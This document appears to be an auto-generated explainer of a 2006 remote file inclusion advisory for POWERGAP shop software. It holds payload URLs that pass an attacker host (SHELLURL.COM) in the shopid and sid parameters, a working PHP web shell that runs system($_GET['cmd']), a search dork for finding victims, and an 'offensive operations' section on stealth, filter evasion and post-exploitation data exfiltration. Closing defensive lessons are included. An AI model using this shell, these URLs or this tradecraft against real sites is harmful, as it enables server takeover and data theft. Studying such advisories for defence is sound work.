By exploitdb papers bot•August 17, 2006•

papers

POWERGAP 2003 - 's0x.php' Remote File Inclusion Explained

What this paper is

This paper, published by Saudi Hackrz in 2006, describes a Remote File Inclusion (RFI) vulnerability in the "POWERGAP" e-commerce software, specifically within its PHP files. The exploit demonstrates how an attacker can trick vulnerable PHP scripts into including and executing arbitrary code from a remote server. This allows for the execution of malicious code on the target web server.

Simple technical breakdown

The core of the vulnerability lies in how the POWERGAP application handles user-supplied input, specifically parameters like shopid. When these parameters are used in PHP's include or require functions without proper sanitization, an attacker can provide a URL pointing to a malicious PHP file on their own server. The vulnerable script then fetches and executes this remote file as if it were a local file, leading to code execution.

The exploit targets several files (s01.php, s02.php, s03.php, s04.php) and uses parameters like shopid and sid to achieve this. The attacker's goal is to replace the expected local file path with a URL to their controlled shell.

Complete code and payload walkthrough

The provided text is not a full exploit script with code and shellcode in the traditional sense. Instead, it's a description of the vulnerability and examples of how to exploit it. It outlines the vulnerable parameters and the structure of the exploit URL.

Here's a breakdown of the "exploit" examples provided:

http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
- sitename.com: This is the target web server.
- /s01.php: This is the vulnerable PHP script on the target server.
- ?shopid=: This indicates the start of the query string and the vulnerable parameter named shopid.
- http://SHELLURL.COM?: This is the attacker-controlled URL.
  - SHELLURL.COM: This is the domain where the attacker hosts their malicious PHP shell.
  - The trailing ? is often used to ensure that any subsequent parameters intended for the remote script are correctly parsed by the remote server, and not misinterpreted by the target server's PHP.
http://sitename.com/s02.php?shopid=http://SHELLURL.COM?
- Similar to the above, but targets s02.php.
http://sitename.com/s03.php?shopid=http://SHELLURL.COM?
- Similar to the above, but targets s03.php.
http://sitename.com/s04.php?shopid==http://SHELLURL.COM
- Targets s04.php. The double equals (==) might be a typo or an attempt to bypass some very basic filtering, though it's functionally similar to a single equals.
http://sitename.com/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://SHELLURL.COM
- This example shows exploitation when the shopid parameter might be preceded by other parameters.
- sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX: This is a placeholder for other parameters that might exist on the URL. The attacker doesn't necessarily care about these; they are just part of the original URL structure.
- &shopid=http://SHELLURL.COM: The vulnerable parameter shopid is appended with the attacker's shell URL.
http://sitename.com/sid=http://SHELLURL.COM
- This suggests that in some cases, the sid parameter itself might be vulnerable to RFI, or it might be used in conjunction with other logic that leads to RFI.

Payload (Implicit):

The "payload" here is not raw shellcode bytes. It's the remote PHP file hosted at SHELLURL.COM. This file would typically contain PHP code designed to:

Receive commands: Often through HTTP GET or POST parameters.
Execute commands: Using PHP functions like exec(), shell_exec(), system(), passthru().
Return output: Send the command results back to the attacker's browser or a logging mechanism.

A very basic example of such a remote PHP shell might look like this (hosted at SHELLURL.COM/shell.php):

<?php
// Basic PHP Web Shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
}
?>

When the vulnerable POWERGAP script includes this shell.php, an attacker could then navigate to:
http://sitename.com/s01.php?shopid=http://SHELLURL.COM/shell.php?cmd=ls -la

The target server would execute ls -la and display the output.

Mapping list:

s01.php, s02.php, s03.php, s04.php: Vulnerable PHP scripts.
shopid parameter: The primary input vector for RFI.
sid parameter: Another potential input vector or part of the vulnerable chain.
http://SHELLURL.COM: Attacker's remote server hosting the malicious payload.
? (trailing): Used to correctly delimit the URL for the remote inclusion.
cmd=... (in remote shell): Parameter used by the attacker to send commands to the executed shell.
system($_GET['cmd']): PHP function used in the remote shell to execute commands.

Practical details for offensive operations teams

Required Access Level: Typically requires the ability to send HTTP requests to the target web application. No local access to the server is needed initially.
Lab Preconditions:
- A target web application running a vulnerable version of POWERGAP.
- An attacker-controlled server accessible via HTTP/HTTPS to host the malicious PHP shell. This server needs to be able to serve PHP files and execute commands.
- A way to test for RFI, such as a simple PHP file that echoes a unique string or performs a simple command.
Tooling Assumptions:
- Web Browser: For manual testing and initial reconnaissance.
- Burp Suite / OWASP ZAP: For intercepting and modifying HTTP requests, automating testing, and identifying vulnerable parameters.
- Command-line tools (curl, wget): For scripting requests and fetching results.
- A simple web server (e.g., Python's http.server, Apache, Nginx) configured to serve PHP: To host the attacker's payload.
Execution Pitfalls:
- Input Sanitization: Modern web applications and PHP versions often have better default configurations and common security practices that prevent RFI. The vulnerability is likely mitigated by allow_url_fopen being disabled or safe_mode being enabled (though safe_mode is deprecated).
- Firewall/WAF: Network firewalls or Web Application Firewalls (WAFs) might block requests to external URLs from the web server or detect the RFI pattern.
- URL Encoding: The target application might perform URL decoding and then sanitization, requiring careful crafting of the payload.
- PHP Configuration: The allow_url_include directive (if enabled) is required for include/require to fetch remote files. If only allow_url_fopen is enabled, file_get_contents or similar functions might still be vulnerable, but include/require would not be.
- Shell Hosting Issues: The attacker's shell server might be down, inaccessible, or blocked by the target's network.
- Parameter Guessing: The exact vulnerable parameter name and script might differ, requiring reconnaissance.
Tradecraft Considerations:
- Reconnaissance: Use search engines (like Google dorks mentioned in the paper) to find potential targets.
- Probing: Test common parameters (id, file, page, include, shopid, sid) on various PHP files (.php, .inc, .html that might include PHP).
- Payload Obfuscation: If basic RFI is blocked, consider techniques like LFI-to-RFI or using different protocols if supported.
- Stealth: Avoid overly noisy requests. Use a reliable shell that doesn't leave obvious traces.
- Post-Exploitation: Once code execution is achieved, focus on privilege escalation, lateral movement, and data exfiltration as per engagement scope.

Where this was used and when

Context: This vulnerability was relevant to websites using the "POWERGAP" e-commerce platform. The paper explicitly mentions http://www.powergap-shop.de and http://www.demo-shop.com as examples of vendor sites.
Timeframe: The exploit was published in August 2006. The vulnerability likely existed in versions of POWERGAP prior to this date, possibly from 2003 onwards (as suggested by the title "POWERGAP 2003"). This type of RFI vulnerability was common in web applications developed in the early to mid-2000s.

Defensive lessons for modern teams

Input Validation is Paramount: Never trust user input. Always validate and sanitize all external data before using it in file operations, database queries, or command execution.
Disable allow_url_fopen and allow_url_include: For most web applications, these PHP directives should be disabled in php.ini to prevent remote file inclusion. allow_url_fopen is often needed for legitimate functions (like fetching RSS feeds), but allow_url_include is rarely, if ever, necessary for typical web applications and is a major security risk.
Use Whitelisting: Instead of trying to block malicious inputs (blacklisting), define a strict list of allowed inputs or file paths.
Secure Coding Practices: Train developers on secure coding principles, including the dangers of dynamic file inclusions and command execution based on user input.
Regular Patching: Keep all software, including web applications and their underlying frameworks/CMS, updated to the latest versions to patch known vulnerabilities.
Web Application Firewalls (WAFs): Implement and configure WAFs to detect and block common attack patterns like RFI. However, WAFs should be a layer of defense, not the sole solution.
Principle of Least Privilege: Ensure that the web server process runs with the minimum necessary privileges.

ASCII visual (if applicable)

+-----------------+      +-----------------+
| Attacker Server |      | Target Server   |
| (SHELLURL.COM)  |      | (sitename.com)  |
|-----------------|      |-----------------|
| - Malicious PHP |      | - POWERGAP App  |
|   Shell         |      |   (s01.php etc.)|
| - Listens for   |      | - Vulnerable    |
|   HTTP requests |      |   'shopid' param|
+-----------------+      +-----------------+
        ^                      |
        |                      | HTTP Request
        |                      | (e.g., GET /s01.php?shopid=http://SHELLURL.COM)
        |                      v
        |      +---------------------------------+
        |      | PHP Interpreter on Target Server|
        |      |---------------------------------|
        |      | 1. Receives request for s01.php |
        |      | 2. Parses 'shopid' parameter    |
        |      | 3. Sees 'http://SHELLURL.COM'   |
        |      | 4. Uses include() or similar    |
        |      | 5. Fetches and EXECUTES         |
        |      |    content from SHELLURL.COM    |
        |      +---------------------------------+
        |                      |
        +----------------------| HTTP Response (with shell output)

Source references

Paper: POWERGAP 2003 - 's0x.php' Remote File Inclusion
Author: Saudi Hackrz
Published: 2006-08-17
Exploit-DB ID: 2201
URL: https://www.exploit-db.com/papers/2201

Original Exploit-DB Content (Verbatim)

#=================================================================
#powergap <= (s0x.php) Remote File Inclusion Exploit
#================================================================
#                                                                   
#Critical Level : Dangerous                                 
#                                                                   
#Venedor site : http://www.powergap-shop.de   
#                                                                   
#http://www.demo-shop.com                           
#                                                                   
#=================================================================
#
#Dork: "powergap" or "s04.php" or s01.php or s02.php
#
#=================================================================
#Bug in : s01.php
#or s02.php
#or s03.php
#or s04.php
#
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s02.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s03.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s04.php?shopid==http://SHELLURL.COM
#   or
#http://sitename.com/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://SHELLURL.COM
#http://sitename.com/sid=http://SHELLURL.COM
#===============================================================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ : SnIpEr_Sa. Alarraab. SHiKaA. King18
#www.3asfh.net
=================================================================

# milw0rm.com [2006-08-17]